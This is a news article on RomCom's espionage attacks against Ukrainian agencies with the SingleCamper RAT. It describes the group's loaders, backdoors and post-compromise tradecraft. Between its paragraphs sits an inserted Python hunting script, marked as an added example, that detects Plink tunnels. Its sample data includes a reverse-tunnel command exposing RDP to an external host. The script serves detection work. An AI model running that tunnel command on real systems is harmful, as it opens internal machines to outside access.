Russian RomCom Attacks Target Ukrainian Government with New SingleCamper RAT Variant

Oct 17, 2024 | Ravie Lakshmanan | Threat Intelligence / Malware

A recent series of cyber attacks targeting Ukrainian government agencies and undisclosed Polish organizations has been attributed to the Russian RomCom threat actor, with activity dating back to at least late 2023.

The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (also known as SnipBot or RomCom 5.0), according to Cisco Talos, which is tracking the activity cluster as UAT-5647.

“This latest edition is directly loaded into memory from the registry and employs a loopback address to establish communication with its loader,” said security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura in their analysis.


Also tracked as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, the RomCom group has carried out a mix of ransomware, extortion, and targeted credential-theft operations since it emerged in 2022.

Recent assessments point to an increased tempo of attacks focused on establishing long-term access to compromised networks and exfiltrating data, indicating a clear espionage motive.

The threat actor is also said to be expanding its tooling and infrastructure, with malware written in several languages and for multiple platforms: C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).

The attack chains begin with a spear-phishing email that delivers a downloader, written in either C++ (MeltingClaw) or Rust (RustyClaw), which deploys the ShadyHammock and DustyHammock backdoors while displaying a decoy document to the victim.

DustyHammock is designed to contact a command-and-control (C2) server, execute arbitrary commands, and download files from the server, whereas ShadyHammock acts as a launchpad for SingleCamper and listens for incoming commands.

Although ShadyHammock has more features, it is believed to be a predecessor of DustyHammock, given that the latter has been used in attacks as recently as September 2024.


SingleCamper, the latest iteration of the RomCom RAT, is used for a range of post-compromise activity, including deploying PuTTY's Plink utility to set up remote tunnels to adversary-controlled infrastructure, network reconnaissance, lateral movement, user and system enumeration, and data exfiltration.
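The Plink tunnelling described above is a concrete behaviour defenders can hunt for in endpoint telemetry. What follows is an added example, not code from the article or from Cisco Talos: a small Python hunt over constructed Sysmon Event ID 1-style process-creation records (the field names Image, OriginalFileName and CommandLine are Sysmon's; the events, paths, hosts and credentials are made up for illustration). It flags any Plink execution, including a renamed copy, that sets up a port forward, and distinguishes reverse tunnels (Plink's -R option, which publishes an internal service such as RDP on the remote host) from local forwards (-L).

```python
"""Hunt for PuTTY Plink port forwards in process-creation telemetry.

Added example; not part of the article or of Cisco Talos' research.
Assumes Sysmon Event ID 1-style records with Image, OriginalFileName
and CommandLine fields. All sample events below are constructed.
"""
import ntpath
import shlex

PLINK_ORIGINAL_NAME = "plink.exe"

# Plink options that consume the following token, so that token must not be
# mistaken for the SSH destination host.
VALUE_OPTIONS = {"-P", "-l", "-pw", "-i", "-L", "-R", "-D", "-m", "-hostkey", "-proxycmd"}


def parse_plink_cmdline(cmdline):
    """Return (destination_host, forwards) parsed from a Plink command line.

    forwards is a list of (kind, spec): kind is 'R' (remote/reverse tunnel)
    or 'L' (local tunnel); spec is Plink's [listen-ip:]listen-port:host:port
    argument. Plink accepts options anywhere on the line, so keep scanning
    after the host token.
    """
    # posix=False keeps Windows backslashes literal and quoted paths intact.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    destination, forwards = None, []
    i = 1  # token 0 is the executable itself
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-R", "-L") and i + 1 < len(tokens):
            forwards.append((tok[1], tokens[i + 1]))
            i += 2
            continue
        if tok in VALUE_OPTIONS:
            i += 2
            continue
        if tok.startswith("-"):
            i += 1
            continue
        if destination is None:
            destination = tok.split("@")[-1]  # user@host -> host
        i += 1
    return destination, forwards


def hunt_plink_tunnels(events):
    """Flag process creations in which Plink establishes a port forward.

    A record counts as Plink if either the Image basename or the
    OriginalFileName (taken from PE version info, so it survives renaming)
    is plink.exe. Plain SSH use without a forward is not reported.
    """
    findings = []
    for ev in events:
        image_name = ntpath.basename(ev["Image"]).lower()
        original = ev.get("OriginalFileName", "").lower()
        if PLINK_ORIGINAL_NAME not in (image_name, original):
            continue
        destination, forwards = parse_plink_cmdline(ev["CommandLine"])
        if not forwards:
            continue
        findings.append({
            "image": ev["Image"],
            "renamed": image_name != PLINK_ORIGINAL_NAME,
            "destination": destination,
            "forwards": forwards,
            "reverse": any(kind == "R" for kind, _ in forwards),
        })
    return findings


# Constructed Sysmon Event ID 1-style records; hosts and credentials are fake.
SAMPLE_EVENTS = [
    {   # routine admin use with no port forward: not flagged
        "Image": r"C:\Program Files\PuTTY\plink.exe",
        "OriginalFileName": "plink.exe",
        "CommandLine": r'"C:\Program Files\PuTTY\plink.exe" -ssh -batch admin@10.0.0.5 uptime',
    },
    {   # renamed Plink exposing local RDP (3389) to an external host via a reverse tunnel
        "Image": r"C:\Users\Public\Music\svchost.exe",
        "OriginalFileName": "plink.exe",
        "CommandLine": r"C:\Users\Public\Music\svchost.exe -ssh -N -batch -pw Hunter2 -R 8443:127.0.0.1:3389 user@203.0.113.25",
    },
    {   # local forward to an internal database: reported, but not a reverse tunnel
        "Image": r"C:\Tools\plink.exe",
        "OriginalFileName": "plink.exe",
        "CommandLine": r"C:\Tools\plink.exe -L 3306:127.0.0.1:3306 dev@db.corp.example",
    },
]

if __name__ == "__main__":
    for finding in hunt_plink_tunnels(SAMPLE_EVENTS):
        print(finding)
```

Matching on OriginalFileName rather than the image path is what catches a Plink copy renamed to blend in, a routine trick with dual-use tools. Reverse (-R) forwards to hosts outside your own address space deserve the highest priority; local (-L) forwards are often legitimate administrative use and are worth baselining before alerting on them.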

“This specific sequence of attacks, targeting prominent Ukrainian entities, is likely part of UAT-5647’s strategy to incrementally establish prolonged access and conduct data exfiltration to advance espionage aims, and potentially pivot to ransomware operations to disrupt and possibly benefit financially from the intrusion,” stated the researchers.

“It is plausible that Polish entities were also victims of these attacks, based on the language settings examined by the malware.”
